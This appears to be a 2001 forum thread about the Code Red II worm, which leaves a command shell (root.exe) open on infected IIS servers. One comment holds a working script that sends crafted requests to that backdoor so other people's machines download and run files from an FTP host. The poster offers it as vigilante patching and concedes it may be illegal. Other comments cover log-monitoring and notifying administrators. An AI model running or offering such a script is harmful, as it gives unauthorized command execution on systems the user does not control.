Code Red II: Shells for the Taking

sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

Re:The Breaking Point

[Malcontent]

You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.

Re:Microsoft Internet Pollution - My Server Log!

[jeremyp]

There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.

Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.

File download script

[nebby]

(Copied from the other thread, for those who are working on a way to fix this worm)

I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository

# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory /pub/cr
DIR="%2fpub%2fcr"

echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80


I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)

Re:File download script

[nebby]

Yeah I realize that. I'm not doing anymore "work" on this, but I figured I might as well post it. I figure I painted myself red enough on one or two win2k cable modems for one lifetime now.

The intention isn't the same as crackers though, writing a script to patch and restart IIS not an in your face "showing their vulnerabilities" crack, it's basically a free-of-charge windows update complements of whoever runs the script. I'm not saying that it is legal, but it's definitely not a "ha ha I got rewt your windows box is insecure" crack. It a "I noticed your computer is insecure, I fixed it. Have a nice day, and don't let it happen again." crack.

If anyone actually sat and wrote a complex script to fix these computers, I *highly* doubt that a sane judge would pound the gavel on them, especially if the good they do is significant enough and measurable. (Personally, I would *love* to see someone outside of Microsoft do this before MS gets the chance to issue a fix and once again look like the good guys even though it's their original fuck up.)

...and these machines are proud of it!

[Sun+Tzu]

heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.

Aural Feedback

[Aldurn]

I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:

#!/usr/bin/perl
while(1) {
system("cat /var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b");
$returnval = system("diff attacks_a attacks_b > /dev/null");
if(0!=$returnval) {
system("cp -f attacks_b attacks_a");
system("play buzzer2.aiff &");
}
sleep(1);
}

Automated notification script

[the+way]

To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:

http://forum.swarthmore.edu/epigone/modperl/nehzah prerm

It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.

Re:Apache users Create default.ida 5mb!!!!

Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.